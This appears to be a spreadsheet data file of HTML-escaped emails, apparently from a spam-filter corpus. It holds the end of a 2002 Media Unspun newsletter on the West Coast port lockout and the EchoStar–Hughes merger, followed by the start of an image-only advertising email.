 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 2,3:article_view --&gt;
 &lt;font face="verdana,arial" size="2"&gt;&lt;br&gt;&lt;/font&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a66461"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Editor's Note
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more successful we are, the more useful we can be to you. Pass it on!&lt;/P&gt;&lt;P&gt;
 Media Unspun serves business news and analysis, authoritatively and irreverently, every business day. An annual subscription costs $50, less than a dollar a week. If your four-week free trial is coming to an end soon, please visit &lt;A HREF="http://www.mediaunspun.com/subscribe.html"&gt;http://www.mediaunspun.com/subscribe.html&lt;/A&gt;  and sign up via credit card or check.&lt;br&gt;
 &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 2,4:article_view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name="a59384"&gt;&lt;/a&gt; 
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Pop!Tech 2002&lt;br&gt;
 October 18 - 20, 2002: Camden, Maine&lt;br&gt;
 Join 500 big thinkers to discuss&lt;br&gt;
 the collision of technology and culture&lt;br&gt;
 Register now at: &lt;A HREF="http://www.poptech.org"&gt;http://www.poptech.org&lt;/A&gt; &lt;br&gt;
 &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 2,5:article_view --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a99481"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Bush Covers the Waterfront
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;It may seem like all Iraq, all the time in the Oval Office, but the president has at least one other thing on his mind this week: that pesky port lockout. The freight still isn't moving, factories are running out of parts, produce is rotting, and retailers are more freaked about Christmas with every passing day. &lt;/P&gt;&lt;P&gt;
 On Monday, Bush stepped in and appointed a three-member panel to see how badly this shutdown is hosing the economy. (We hope this isn't a difficult question, as the panel's been given all of one day to report back.) When Bush gets the report on Tuesday, the next step might be a court order to reopen the ports under the 1947 Taft-Hartley Act. That would send employees back to work for 80 days while federal mediators duke it out over the disputed contract and retailers lower their Xanax
 dosages.&lt;/P&gt;&lt;P&gt;
 Invoking Taft-Hartley requires a threat to national health or safety -- not the economy. But Labor Secretary Elaine Chao covered that base in a statement on Monday, saying the work stoppage threatens the flow of supplies to the military (we knew Iraq would be in here somewhere). "Union officials quickly responded that their members have been unloading military cargo throughout the 10-day shutdown," said the L.A. Times, but an anonymous Bush administration official "said that only a portion of
 what the Defense Department needs has made it ashore."&lt;/P&gt;&lt;P&gt;
 Politically, this has been a tricky one. Using Taft-Hartley would annoy labor right before congressional elections. On the other hand, "Voter discontent with Bush's handling of the increasingly fragile economic recovery has begun showing up in polls, and such concerns may have outweighed the political danger to the Republican administration," said the San Francisco Chronicle. Also, Bush stepped in on the same day that a poll reported two-thirds of Americans wanted him to focus more on the
 economy. "Though the administration promised an unbiased examination of the lockout, Bush appeared to have made up his mind that it was hurting national security and the economy, andmerited federal intervention," said the AP. &lt;/P&gt;&lt;P&gt;
 As for Taft-Hartley, it's not exactly famous for solving labor disputes. Often the 80-day cooling-off period ends, and workers simply walk out again (or get locked out again, in this case). One gets the sense, however, that fixing the dockworkers' contract isn't the point of this particular 80 days. It's 78 days until Christmas. The race is on. - Jen Muehlbauer&lt;/P&gt;&lt;P&gt;
 President Acts To Halt Port Lockout for 80 Days (Seattle Times)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1usn"&gt;http://tinyurl.com/1usn&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bush Expected To Act on Ports Crisis &lt;br&gt;
 &lt;A HREF="http://www.accessatlanta.com/ajc/business/1002/08ports.html"&gt;http://www.accessatlanta.com/ajc/business/1002/08ports.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 President Moves Toward Forcing the Reopening of West Coast Ports&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-ports8oct08001439,0,1021983.story"&gt;http://www.latimes.com/business/la-fi-ports8oct08001439,0,1021983.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bush Takes Step Toward Halting Lockout After West Coast Port Talks Break Off (AP)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1usk"&gt;http://tinyurl.com/1usk&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 White House Intervenes on Docks Dispute (Financial Times)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1usm"&gt;http://tinyurl.com/1usm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Cooling-off Period Likely in Port Fight (SF Chronicle)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1usp"&gt;http://tinyurl.com/1usp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bush Moves Toward Halting Port Shutdown&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/08/national/08PORT.html"&gt;http://www.nytimes.com/2002/10/08/national/08PORT.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Trouble On The Docks&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/page/0,,2_0864,00.html"&gt;http://online.wsj.com/page/0,,2_0864,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.)&lt;/P&gt;&lt;P&gt;
 Charges of Politics Have Dogged Taft-Hartley Act&lt;br&gt;
 &lt;A HREF="http://seattlepi.nwsource.com/business/90243_hartley08.shtml"&gt;http://seattlepi.nwsource.com/business/90243_hartley08.shtml&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Taft-Hartley Act No Quick-Fix For Port Dispute (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.forbes.com/work/newswire/2002/10/02/rtr739458.html"&gt;http://www.forbes.com/work/newswire/2002/10/02/rtr739458.html&lt;/A&gt; &lt;br&gt;
 &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 2,6:article_view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name="a75853"&gt;&lt;/a&gt; 
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;SPECIAL OFFER!   Save 24% on a subscription to MIT TECHNOLOGY REVIEW. Get an inside view into the technologies, deals, and companies emerging from one of the leading research institutes -- MIT. &lt;br&gt;
 &lt;A HREF="http://www.technologyinsider.com/new/news1"&gt;http://www.technologyinsider.com/new/news1&lt;/A&gt;  &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 2,7:article_view --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a99482"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			The Biggest Cable Hookup
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;wo birds want to join forces and the FCC is about to cry "fowl." We mean "foul." The two dominant direct broadcast satellite players want to join forces, the better to compete with Big Cable. Federal regulators, both the FCC and the Justice Department, are concerned that the resulting conglomerate of DirecTV with Dish Network would command roughly 95% of satellite service in the US.&lt;/P&gt;&lt;P&gt;
 The press could not settle on a price tag for the proposed merger between EchoStar Communications and Hughes Electronics -- it was described as being worth anywhere from $15 billion and $25 billion. It was a challenge to keep the players straight, as some outlets talked of a merger between the corporate parents, and others referred to the service monikers. Hughes is DirecTV and EchoStar is Dish. All straight?&lt;/P&gt;&lt;P&gt;
 The two companies sent a letter to the FCC urging them to hold off ruling on (read, rejecting) the merger until the Justice Department has spoken. EchoStar and Hughes offered unspecified "major revisions" to the deal that they want to discuss with Justice in the next weeks.&lt;/P&gt;&lt;P&gt;
 The Wall Street Journal delved deeply into the form those revisions could take -- specifically, selling some frequencies to Cablevision. The Journal reported that Cablevision has wanted to get into the satellite business for 10 years and outlined the cable company's plans and past spending on such a project.&lt;/P&gt;&lt;P&gt;
 TheStreet.com turned in an extensive analysis of the deal for investors in the satellite space. It seems the market for expanded-service television may be nearing saturation. TheStreet.com quoted an analyst's report which concluded, "Consumers should benefit from ... continued rivalry, but shareholders may realize much smaller returns."&lt;/P&gt;&lt;P&gt;
 The New York Times and the Journal both mentioned Rupert Murdoch waiting in the wings. Last year Murdoch's News Corp. bid for DirecTV, but lost out at the last minute to EchoStar. If the current deal falls through, he'll be back. - Keith Dawson&lt;/P&gt;&lt;P&gt;
 EchoStar and Hughes Propose Concessions in Bid to Save Deal&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB103403314258094560,00.html"&gt;http://online.wsj.com/article/0,,SB103403314258094560,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required)&lt;/P&gt;&lt;P&gt;
 Regulators Set to Block EchoStar's Hughes Purchase&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1033939901346228393,00.html"&gt;http://online.wsj.com/article/0,,SB1033939901346228393,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required)&lt;/P&gt;&lt;P&gt;
 'Last-ditch effort' (Rocky Mountain News)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1upi"&gt;http://tinyurl.com/1upi&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 EchoStar, Hughes See a Glimmer of Hope&lt;br&gt;
 &lt;A HREF="http://www.thestreet.com/tech/georgemannes/10046366.html"&gt;http://www.thestreet.com/tech/georgemannes/10046366.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 F.C.C. Asked to Put Off Merger Ruling&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/08/business/media/08BIRD.html"&gt;http://www.nytimes.com/2002/10/08/business/media/08BIRD.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 EchoStar, Hughes ask FCC to defer decision&lt;br&gt;
 &lt;A HREF="http://www.nypost.com/business/59145.htm"&gt;http://www.nypost.com/business/59145.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 EchoStar, Hughes offer merger changes (Reuters) &lt;br&gt;
 &lt;A HREF="http://news.com.com/2100-1023-961138.html"&gt;http://news.com.com/2100-1023-961138.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Delay in satellite-TV merger OK requested (AP)&lt;br&gt;
 &lt;A HREF="http://www.bayarea.com/mld/mercurynews/business/4236430.htm"&gt;http://www.bayarea.com/mld/mercurynews/business/4236430.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 EchoStar, Hughes Seek to Delay Ruling&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/technology/la-fi-echo8oct08,0,3454976.story"&gt;http://www.latimes.com/technology/la-fi-echo8oct08,0,3454976.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 EchoStar pleads to FCC on merger (Denver Post)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1ut7"&gt;http://tinyurl.com/1ut7&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a99483"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;SEC Probes AOL-Oxygen Pact For Double-Booking of Revenue&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1033938113684731193,00.html"&gt;http://online.wsj.com/article/0,,SB1033938113684731193,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.)&lt;/P&gt;&lt;P&gt;
 Tivo Raises $25 Million in Stock Offering (AP)&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/4235118.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/4235118.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 WorldCom Officer Pleads Guilty to Fraud&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A57300-2002Oct7.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A57300-2002Oct7.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Two Magazines Are Shut and a Third Revamps&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/08/business/media/08MAG.html"&gt;http://www.nytimes.com/2002/10/08/business/media/08MAG.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Regulators Say They Have CSFB 'Smoking Gun'&lt;br&gt;
 &lt;A HREF="http://www.usatoday.com/money/industries/banking/2002-10-06-csfb_x.htm"&gt;http://www.usatoday.com/money/industries/banking/2002-10-06-csfb_x.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Expected Cold Winter Could Increase Natural Gas Prices &lt;br&gt;
 &lt;A HREF="http://www.accessatlanta.com/ajc/business/1002/08gas.html"&gt;http://www.accessatlanta.com/ajc/business/1002/08gas.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Frozen World Found Beyond Pluto&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/818195.asp"&gt;http://www.msnbc.com/news/818195.asp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Fool Me Once&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/08/opinion/08KRUG.html"&gt;http://www.nytimes.com/2002/10/08/opinion/08KRUG.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 New Northwest System for Internet Bookings&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/08/business/08MEMO.html"&gt;http://www.nytimes.com/2002/10/08/business/08MEMO.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 The Fastest-Growing Tech Companies&lt;br&gt;
 &lt;A HREF="http://www.business2.com/b2100/0,,1-1,00.html"&gt;http://www.business2.com/b2100/0,,1-1,00.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Debating the Baby Bells&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/07/business/07PLAC.html"&gt;http://www.nytimes.com/2002/10/07/business/07PLAC.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required)&lt;/P&gt;&lt;P&gt;
 Silicon Valley Is Yearning For User-Friendly Microsoft&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1034036651300028760,00.html"&gt;http://online.wsj.com/article/0,,SB1034036651300028760,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required)&lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 2,8:article_view --&gt;
 &lt;font face="verdana,arial" size="2"&gt;&lt;FONT face=Verdana size=1&gt;&lt;STRONG&gt;Sponsor&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/font&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="1" bgcolor="#000000"&gt; 
 &lt;tr&gt;&lt;td&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFCC"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFCC"&gt;
 	&lt;TABLE bgcolor="#FFFFCC" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFCC"&gt;&lt;td&gt;
 	&lt;a name="a59804"&gt;&lt;/a&gt; 
 			&lt;font face="verdana,arial" size="2"&gt;
 					Do you want to reach the Net's savviest audience?&lt;BR&gt;
 Advertise in Media Unspun.&lt;br&gt;
 Contact Erik Vanderkolk for details at &lt;a href="mailto:erikvanderkolk@yahoo.com"&gt;erikvanderkolk@yahoo.com&lt;/A&gt; today.
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- 2,9:article_view --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a59810"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Staff
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					Written by Deborah Asbrand (&lt;a href="mailto:dasbrand@world.std.com"&gt;dasbrand@world.std.com&lt;/a&gt;), Keith Dawson (&lt;a href="mailto:dawson@world.std.com"&gt;dawson@world.std.com&lt;/a&gt;), Jen Muehlbauer (&lt;a href="mailto:jen@englishmajor.com"&gt;jen@englishmajor.com&lt;/a&gt;), and Lori Patel (&lt;a href="mailto:loripatel@hotmail.com"&gt;loripatel@hotmail.com&lt;/a&gt;).
 &lt;P&gt;
 Copyedited by Jim Duffy (&lt;a href="mailto:jimduffy86@yahoo.com"&gt;jimduffy86@yahoo.com&lt;/a&gt;).
 &lt;P&gt;
 Advertising: Erik Vanderkolk (&lt;a href="mailto:erikvanderkolk@yahoo.com"&gt;erikvanderkolk@yahoo.com)&lt;/a&gt;.
 &lt;P&gt;
 Editor and publisher: Jimmy Guterman (&lt;a href="mailto:guterman@vineyard.com"&gt;guterman@vineyard.com&lt;/a&gt;).
 &lt;P&gt;
 Media Unspun is produced by &lt;a href="http://guterman.com"&gt;The Vineyard Group Inc.&lt;/a&gt;
 &lt;BR&gt;Copyright 2002 Media Unspun, Inc., and The Vineyard Group, Inc.
 &lt;BR&gt;Subscribe already, willya? &lt;a href="http://www.mediaunspun.com"&gt;http://www.mediaunspun.com&lt;/a&gt;
 &lt;P&gt;
 Redistribution by email is permitted as long as a link to &lt;a href="http://newsletter.mediaunspun.com"&gt;http://newsletter.mediaunspun.com&lt;/a&gt; is included.
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 2 --&gt;
 		&lt;/td&gt;&lt;td width="5" valign="top" align="center" &gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="5"&gt;&lt;/td&gt;
 			&lt;td width="1" valign="top" align="center" bgcolor="#888888"&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;
 			&lt;td width="5" valign="top" align="center" &gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="5"&gt;&lt;/td&gt;&lt;td width="161" valign="top" bgcolor="#FFFFFF"&gt;&lt;!-- 3,1:subscription --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="1" bgcolor="#000000"&gt; 
 &lt;tr&gt;&lt;td&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#EEEEEE"&gt;
 &lt;tr&gt;&lt;td
 bgcolor="#000000"&gt;
 	&lt;font face="arial" size="2" color="#FFFFFF"&gt;&lt;b&gt;
 		Subscribe
 	&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#EEEEEE"&gt;
 		&lt;form method="POST" action="http://www.imakenews.com/eletra/mod_input_proc.cfm"&gt;
 &lt;p&gt;&lt;font face="verdana,arial" size="1"&gt;
 Enter your email address in the box below to receive a free four-week trial of Media Unspun: 
 &lt;/font&gt;&lt;/p&gt;
 		  &lt;input type="hidden" name="XXDESXXuser" value="mediaunspun"&gt;
 		  &lt;input type="hidden" name="mod_name" value="subscription"&gt;
 		  &lt;input type="hidden" name="XXDESXXfrom_address" value="guterman@vineyard.com"&gt;
           &lt;input type="hidden" name="XXDESXXfrom_name" value="Media Unspun"&gt;
 			 &lt;input type="hidden" name="XXDESXXpage" value="http://newsletter.mediaunspun.com/index000021410.cfm"&gt;		  
 	&lt;p&gt;&lt;input type="text" name="XXDESXXemail_address" size="15" maxlength="100"&gt;
 		&lt;br&gt;&lt;font face="verdana" size="1"&gt;
 			&lt;input type="radio" value="Add" name="XXDESXXsubscribe_op" checked&gt;
 			Add
 		&lt;input type="radio" value="Remove" name="XXDESXXsubscribe_op"&gt;
 		Remove&lt;br&gt;
 		&lt;input type="checkbox" name="XXDESXXemail_type" value="htm" checked&gt;
 		SendasHTML&lt;br&gt;
 	  &lt;input type="submit" value="Submit" name="add"&gt;&amp;nbsp;
 	&lt;/font&gt;&lt;/p&gt;
 		&lt;/form&gt;	
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;font face="verdana,arial" size="2"&gt;&lt;FONT face=Verdana size=1&gt;&lt;STRONG&gt;
 &lt;P align=center&gt;&lt;BR&gt;Newsletter Services &lt;BR&gt;Provided by &lt;BR&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;A href="http://www.imakenews.com/affiliate.cfm?a_id=unspun"&gt;&lt;FONT face=Verdana size=1&gt;&lt;STRONG&gt;iMakeNews.com&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;&lt;/font&gt;
 			&lt;!-- 3,2:survey_view --&gt;
 			&lt;!-- 3,3:menu --&gt;
 			&lt;!-- 3,4:article_view --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td
 bgcolor="#000000"&gt;
 	&lt;font face="arial" size="2" color="#FFFFFF"&gt;&lt;b&gt;
 		&lt;CENTER&gt;Advertisement&lt;/CENTER&gt;
 	&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 				&lt;a href="http://www.poptech.org"&gt;&lt;img src="http://a298.g.akamai.net/7/298/5382/100802091859/www.imakenews.com/mediaunspun/mediaunspun_e_a000089486.JPG" BORDER="0" alt="" hspace="5" vspace="1" align="top"&gt;&lt;/a&gt;
 				&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table bgcolor="#FFFFFF" border="0" cellpadding="0" cellspacing="0" width="100%" cols="1"&gt;
 	&lt;tr&gt;&lt;td width="644" valign="top" bgcolor="#FFFFFF"&gt;&lt;!-- 4,1:footer --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;div align="left"&gt;
 	&lt;table border="0" cellpadding="2" cellspacing="0" width="100%" bgcolor="#FFFFFF"&gt;
 	  &lt;tr&gt;
 	    &lt;td&gt;
 		&lt;font face="verdana,arial" size="1"&gt;
 		&lt;/font&gt;
 		&lt;/td&gt;
 				&lt;td align="right" valign="top"&gt;
 			&lt;font face="verdana,arial" size="1"&gt;
 			&lt;b&gt;
 			&lt;a href="http://www.imakenews.com/eletra/mod_input_proc.cfm?mod_name=tell_friend_form&amp;XXDESXXuser=mediaunspun&amp;XXDESXXthanks=Thank%20You%2E&amp;XXDESXXsubject=Check%20this%20out%3A%20%5B%5Btitle%5D%5D&amp;XXDESXXheading=&amp;XXDESXXbackto=http://newsletter.mediaunspun.com/index000021410.cfm&amp;XXDESXXissue_id=21410&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a281108918594847-footer_tellafriend"&gt;
 			&lt;font size=4&gt;Tell a Friend...&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--IMN:BOTTOM--&gt;
 &lt;table border="0" cellpadding="2" cellspacing="0" width="650"&gt;
   &lt;tr&gt;&lt;td&gt;&lt;font face="verdana,arial" size="1"&gt;Powered by &lt;strong&gt;&lt;a href="http://www.imakenews.com" target="_top" class="link"&gt;iMakeNews.com&lt;/a&gt;&amp;#153;&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;
 	&lt;font face="verdana,arial" size="1"&gt;This email was sent to: zzzz-unspun@spamassassin.taint.org &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzzz-unspun@spamassassin.taint.org"&gt;(REMOVE)&lt;/a&gt; - to be instantly deleted from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzzz-unspun@spamassassin.taint.org%2Ctxt"&gt;(CHANGE FORMAT)&lt;/a&gt; - receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzzz-unspun@spamassassin.taint.org"&gt;(UPDATE)&lt;/a&gt; your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E224536,5114587XXmediaunspunXX21410XXXXindex000021410.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1034083278-26594-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;mailv05a.gif&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff"&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="569" align="center"&gt;
   &lt;tr&gt;
    &lt;td colspan="2"&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/mailv05a_01.jpg" width="569" height="140" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td colspan="2"&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/mailv05a_02.gif" width="569" height="246" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/mailv05a_03.gif" width="200" height="70" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=BLNLUCTCHEAD"&gt;&lt;img src="http://theadmanager.com/ads/bottomline/imgs/mailv05a_04.gif" width="369" height="70" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
